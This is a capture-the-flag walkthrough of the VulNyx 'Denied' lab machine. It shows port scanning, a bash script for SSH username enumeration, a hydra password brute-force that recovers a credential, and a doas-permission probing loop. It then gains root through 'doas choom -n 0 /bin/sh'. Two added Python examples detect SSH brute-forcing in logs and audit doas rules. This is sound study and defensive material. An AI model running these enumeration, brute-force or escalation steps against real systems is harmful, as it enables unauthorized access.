Denied

Posted by axlfpe on 2025-06-09
Estimated Reading Time 11 Minutes
Words 2.2k In Total

Target IP: 192.168.108.137

Attacker IP: 192.168.108.50

Target source: https://vulnyx.com/

Kal ddddx ~ ❯ export ip=192.168.108.137                                                                     at 14:10:09
Kal ddddx ~ ❯ rustscan -a $ip at 14:10:17
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.108.137:22
Open 192.168.108.137:80
Open 192.168.108.137:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 14:10 CST
Initiating ARP Ping Scan at 14:10
Scanning 192.168.108.137 [1 port]
Completed ARP Ping Scan at 14:10, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:10
Completed Parallel DNS resolution of 1 host. at 14:10, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:10
Scanning 192.168.108.137 [3 ports]
Discovered open port 80/tcp on 192.168.108.137
Discovered open port 8080/tcp on 192.168.108.137
Discovered open port 22/tcp on 192.168.108.137
Completed SYN Stealth Scan at 14:10, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.108.137
Host is up, received arp-response (0.00089s latency).
Scanned at 2025-06-09 14:10:25 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:87:FB:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
Port | Protocol | Service | Description
22 | TCP | SSH | Remote login; weak passwords or brute-force exposure possible
80 | TCP | HTTP | Web service; typical issues include XSS, SQL injection and directory traversal
8080 | TCP | HTTP-Proxy | Possibly a second web application or a reverse proxy; also worth close attention

Ports 22, 80 and 8080 are open. Visiting the two web ports, both 80 and 8080 serve Apache's default page, and directory brute-forcing returns identical results on both, so they are probably the same web service listening on two ports.


Kal ddddx ~ ❯ gobuster dir -u http://192.168.108.137 -w /usr/share/wordlists/dirb/common.txt -t 50  took 6s at 14:10:25
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.108.137
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 10701]
/server-status (Status: 403) [Size: 280]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Kal ddddx ~ ❯ gobuster dir -u http://192.168.108.137:8080 -w /usr/share/wordlists/dirb/common.txt -t 50 at 14:14:21
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.108.137:8080
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 282]
/.htpasswd (Status: 403) [Size: 282]
/.htaccess (Status: 403) [Size: 282]
/index.html (Status: 200) [Size: 10701]
/server-status (Status: 403) [Size: 282]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Next, port 22. A direct root login attempt shows the username exists but the password is wrong; the walkthrough author wrote a script to brute-force valid usernames instead.

Kal ddddx ~ ❯ ssh root@192.168.108.137                                                                ✘ 255 at 14:22:55
The authenticity of host '192.168.108.137 (192.168.108.137)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.108.137' (ED25519) to the list of known hosts.
root@192.168.108.137: Permission denied (publickey).
#!/bin/bash
# Run this script with the bash interpreter
# Install the interrupt-signal handler
trap ctrl_c INT
# Colour codes
RED="\e[91m"    # red
GREEN="\e[92m"  # green
YELLOW="\e[93m" # yellow
BLUE="\e[34m"   # blue
WHITE="\e[97m"  # white
# Read the username list from names.txt into USERS
USERS=$(<names.txt)
# Target host IP
RHOST="192.168.108.137"
# SSH port
RPORT="22"
# ctrl_c runs when the user presses Ctrl+C
function ctrl_c(){
    echo
    exit 1
}
# Iterate over every username in USERS
for USER in ${USERS}; do
    # Attempt an SSH connection with a 0.5 s timeout
    # -o StrictHostKeyChecking=no skips host key verification
    # &>/dev/null discards stdout and stderr
    timeout 0.5 ssh ${USER}@${RHOST} -p ${RPORT} -o StrictHostKeyChecking=no &>/dev/null
    # Check the exit status of the previous command
    # A status other than 255 (SSH connection failure) means the server did not
    # reject the user outright (e.g. the timeout fired while waiting for a
    # password prompt), so the account exists
    if [ $? -ne 255 ]; then
        # Print a success message with colour
        echo -e "${BLUE}SSH    ${WHITE}${RHOST}:${RPORT}  ${GREEN}[+] ${WHITE}User ${GREEN}${USER} ${YELLOW}(Pwn3d!)"
        # Exit once a valid user is found
        exit
    else
        # Print a failure message with colour
        echo -e "${BLUE}SSH    ${WHITE}${RHOST}:${RPORT}  ${RED}[-] ${WHITE}User ${RED}${USER} ${WHITE}Permission denied (publickey)"
    fi
done

With a username in hand, hydra brute-forces the password and finds it; with username and password we can log in over SSH. The flags used:

  • exit as soon as a valid password is found (-f);
  • ignore the restore record from the previous run (-I).
Kal ddddx ~ ❯ hydra -I -l akira -P /usr/share/wordlists/rockyou.txt ssh://192.168.108.137 -t 64 -f took 48s at 15:01:49
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-09 15:01:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.108.137:22/

[22][ssh] host: 192.168.108.137 login: akira password: shakira
[STATUS] attack finished for 192.168.108.137 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-09 15:02:43
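What the target's own logs look like while the username enumeration script and the hydra run above are in progress, and how a defender would pick both out, as an added example that is not part of the original write-up. The Python below works over constructed sshd lines in OpenSSH's syslog format (hostname, PIDs, ports and times are invented), and the detection thresholds are assumptions of the example. The behaviour it relies on is OpenSSH's: a username with no account is logged as "Invalid user X", while the script's 0.5 s timeout against a real account shows up as "Connection closed by authenticating user X ... [preauth]". Many distinct usernames from one source is therefore the enumeration signature, many failed passwords for one user is the brute-force signature, and a success from the same source right after those is the event worth paging on.

```python
"""Spot SSH user enumeration and password brute-forcing in sshd log lines.

Added example, not the box's or the write-up author's code. Thresholds and
the sample log below are assumptions of the example.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: hostname, PIDs, ports and timestamps are invented.
SAMPLE_LOG = """\
Jun  9 14:30:01 denied sshd[1201]: Invalid user admin from 192.168.108.50 port 50211
Jun  9 14:30:01 denied sshd[1201]: Connection closed by invalid user admin 192.168.108.50 port 50211 [preauth]
Jun  9 14:30:02 denied sshd[1203]: Invalid user guest from 192.168.108.50 port 50213
Jun  9 14:30:02 denied sshd[1205]: Invalid user test from 192.168.108.50 port 50215
Jun  9 14:30:03 denied sshd[1207]: Invalid user oracle from 192.168.108.50 port 50217
Jun  9 14:30:03 denied sshd[1209]: Invalid user postgres from 192.168.108.50 port 50219
Jun  9 14:30:04 denied sshd[1211]: Connection closed by authenticating user akira 192.168.108.50 port 50221 [preauth]
Jun  9 15:01:53 denied sshd[1300]: Failed password for akira from 192.168.108.50 port 50400 ssh2
Jun  9 15:01:53 denied sshd[1301]: Failed password for akira from 192.168.108.50 port 50401 ssh2
Jun  9 15:01:54 denied sshd[1302]: Failed password for akira from 192.168.108.50 port 50402 ssh2
Jun  9 15:01:54 denied sshd[1303]: Failed password for akira from 192.168.108.50 port 50403 ssh2
Jun  9 15:01:55 denied sshd[1304]: Failed password for akira from 192.168.108.50 port 50404 ssh2
Jun  9 15:01:56 denied sshd[1305]: Failed password for akira from 192.168.108.50 port 50405 ssh2
Jun  9 15:02:43 denied sshd[1340]: Accepted password for akira from 192.168.108.50 port 50440 ssh2
Jun  9 16:10:00 denied sshd[1400]: Accepted publickey for akira from 192.168.108.20 port 40000 ssh2: ED25519 SHA256:constructed
"""

# syslog prefix shared by every sshd message we care about
_TS = r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
PATTERNS = {
    # a username with no account behind it: the enumeration signature
    "invalid_user": re.compile(_TS + r"Invalid user (?P<user>\S+) from (?P<ip>\S+) port \d+"),
    # client gave up before finishing; "authenticating user" means the account exists
    "closed_preauth": re.compile(_TS + r"Connection closed by (?:authenticating|invalid) user "
                                 r"(?P<user>\S+) (?P<ip>\S+) port \d+ \[preauth\]"),
    # wrong password for an existing account (or, with the prefix, a non-existing one)
    "failed": re.compile(_TS + r"Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"),
    "accepted": re.compile(_TS + r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+"),
}


def parse_line(line):
    """Return (kind, timestamp, user, ip) for a recognised sshd message, else None."""
    for kind, rx in PATTERNS.items():
        m = rx.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            return kind, ts, m.group("user"), m.group("ip")
    return None


def analyze(lines, enum_users=5, brute_attempts=5):
    """Aggregate sshd events per source IP and attach findings to each."""
    by_ip = defaultdict(lambda: {"users": set(), "failed_by_user": defaultdict(int),
                                 "succeeded": [], "first": None, "last": None})
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        kind, ts, user, ip = ev
        st = by_ip[ip]
        st["first"] = ts if st["first"] is None else min(st["first"], ts)
        st["last"] = ts if st["last"] is None else max(st["last"], ts)
        if kind == "accepted":
            st["succeeded"].append(user)
            continue
        st["users"].add(user)  # every probe counts, whether the account exists or not
        if kind == "failed":
            st["failed_by_user"][user] += 1

    report = {}
    for ip, st in by_ip.items():
        findings = []
        if len(st["users"]) >= enum_users:
            findings.append("user-enumeration")
        for user, n in st["failed_by_user"].items():
            if n >= brute_attempts:
                findings.append(f"password-brute-force:{user}")
        for user in st["succeeded"]:
            # a login from a source that was just probing or guessing is the priority event
            if st["failed_by_user"].get(user, 0) > 0 or user in st["users"]:
                findings.append(f"success-after-failures:{user}")
        report[ip] = {
            "distinct_users": len(st["users"]),
            "failed_by_user": dict(st["failed_by_user"]),
            "span_seconds": int((st["last"] - st["first"]).total_seconds()),
            "findings": findings,
        }
    return report


if __name__ == "__main__":
    for ip, r in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, r["distinct_users"], "users,", r["span_seconds"], "s,", r["findings"] or "clean")
```

The span in seconds is kept so the same counts can be turned into a rate; six failures for one account spread over a week is a forgetful user, six in three seconds is hydra.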


akira@denied:~$ sudo -l
-bash: sudo: orden no encontrada

sudo -l shows that sudo is not installed, but we can look for SUID programs by other means.

find / -perm -4000 -type f 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/doas
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysig
Program path | Usable for privilege escalation? | Analysis
/usr/bin/mount, /usr/bin/umount | - | Normal tools with restricted arguments; hard to abuse
/usr/bin/chsh, /usr/bin/chfn | ⚠️ | Can set the login shell; possibly useful (see below)
/usr/bin/passwd, /usr/bin/su, /usr/bin/newgrp, /usr/bin/gpasswd | - | Standard SUID programs; restricted
/usr/lib/openssh/ssh-keysign | - | Special-purpose; not directly usable
/usr/lib/dbus-1.0/dbus-daemon-launch-helper | ⚠️ | May be vulnerable (depends on the system version)
/usr/bin/doas | ✅ possibly usable | Focus here: likely a sudo replacement


The next step is brute-forcing again; let's just follow the author's approach.

ls -l /usr/bin/ | awk '{print $9}' > bins.dic

Step by step:

ls -l /usr/bin/

  • ls: list directory contents.
  • -l: long format, showing details for each file (permissions, owner, size, time, etc.).
  • /usr/bin/: the directory to list; it holds most of the system's commands and executables.

| awk '{print $9}'

  • |: the pipe, passing the output of ls -l to awk.
  • awk '{print $9}': print the 9th field of each line (fields are separated by spaces or tabs), which is normally the file name.
while read -r bin; do doas -n /usr/bin/"$bin" --help >/dev/null 2>&1; ec=$?; if [ $ec -eq 0 ]; then echo "[+] $bin allowed"; elif [ $ec -ne 1 ]; then echo "[-] $bin denied (exit $ec)"; fi; done < bins.dic

Explained as a table:

Part | Meaning | Purpose
while read -r bin | read bins.dic line by line | each iteration reads one binary name into the variable bin
doas -n /usr/bin/"$bin" --help >/dev/null 2>&1 | run the command's --help through doas in non-interactive mode (-n) | tests whether the current user is allowed to run this command
ec=$? | save the exit status of the previous command | the exit code is what tells us whether it ran
if [ $ec -eq 0 ] | check whether the exit code is 0 | 0 means it ran successfully, so the command is permitted
echo "[+] $bin allowed" | print a success message | the command may be run through doas
elif [ $ec -ne 1 ] | not the ordinary --help failure code 1 | probably a permission error or some other failure
echo "[-] $bin denied (exit $ec)" | print a denial message | the command cannot be run through doas
done < bins.dic | end of the loop, fed from bins.dic | command names are read from bins.dic
doas /usr/bin/choom -n 0 /bin/sh
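The whole escalation rests on one doas rule, and the lesson for whoever writes such rules is that permitting a program whose job is to run another program is no restriction at all: choom sets the OOM score of the command it is given and then executes it, so "akira may run choom as root" means "akira may run anything as root". The Python below audits a doas.conf for exactly that class of rule. It is an added example, not the box's configuration or the write-up author's code; the sample configuration is constructed, and the set of launcher programs it checks is an assumption of the example, not an exhaustive list.

```python
"""Audit doas.conf rules that amount to unrestricted root.

Added example, not the box's configuration or the write-up author's code.
Rule grammar per doas.conf(5):
    permit|deny [options] identity [as target] [cmd command [args ...]]
"""
import os

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

# Programs that exist to execute the command named on their own command line.
# Permitting one of them permits every command. This set is an assumption of
# the example, not an exhaustive list; choom is the one the write-up uses.
LAUNCHERS = {"choom", "env", "nice", "nohup", "setsid", "timeout", "stdbuf"}

# Constructed doas.conf for the example, not the target's real file.
SAMPLE_CONF = """\
# administrators: any command, password cached for a while
permit persist :wheel
permit nopass akira as root cmd /usr/bin/choom args -n 0 /bin/sh
permit nopass backup as root cmd /usr/bin/rsync args -a /srv/data /mnt/backup
permit keepenv setenv { PATH FOO=bar } ops cmd /usr/bin/systemctl args restart nginx
deny akira cmd /usr/bin/su
"""


def parse_rule(line):
    """Parse one doas.conf line into a dict; return None for blanks and comments."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    tok = line.split()
    rule = {"action": tok[0], "options": set(), "identity": None,
            "target": "root", "cmd": None, "args": None}
    i = 1
    # options precede the identity; setenv carries a brace-delimited list
    while i < len(tok) and (tok[i] in OPTIONS or tok[i] == "setenv"):
        if tok[i] == "setenv":
            i = tok.index("}", i) + 1
        else:
            rule["options"].add(tok[i])
            i += 1
    if i >= len(tok):
        raise ValueError(f"rule without identity: {line!r}")
    rule["identity"] = tok[i]
    i += 1
    if i < len(tok) and tok[i] == "as":
        rule["target"] = tok[i + 1]
        i += 2
    if i < len(tok) and tok[i] == "cmd":
        rule["cmd"] = tok[i + 1]
        i += 2
        if i < len(tok) and tok[i] == "args":
            rule["args"] = tok[i + 1:]
    return rule


def audit(conf_text):
    """Return findings for permit rules that hand out an unrestricted target account."""
    findings = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        rule = parse_rule(line)
        if rule is None or rule["action"] != "permit":
            continue
        if rule["cmd"] is None:
            issue = f"no cmd: any command as {rule['target']}"
        elif os.path.basename(rule["cmd"]) in LAUNCHERS:
            issue = (f"{rule['cmd']} executes the program named in its arguments, "
                     f"so this is any command as {rule['target']}")
        else:
            continue
        findings.append({
            "line": n,
            "identity": rule["identity"],
            "cmd": rule["cmd"],
            # nopass turns a bad rule into an unauthenticated one
            "severity": "high" if "nopass" in rule["options"] else "medium",
            "issue": issue,
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CONF):
        print(f"line {f['line']} [{f['severity']}] {f['identity']}: {f['issue']}")
```

The audit flags a launcher even when the rule pins its args, because on this box the pinned args were themselves a shell; a stricter version would inspect the args and accept only a fixed, non-shell program. The rsync and systemctl rules in the sample pass because each names one program with fixed arguments, which is what a doas rule should look like.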


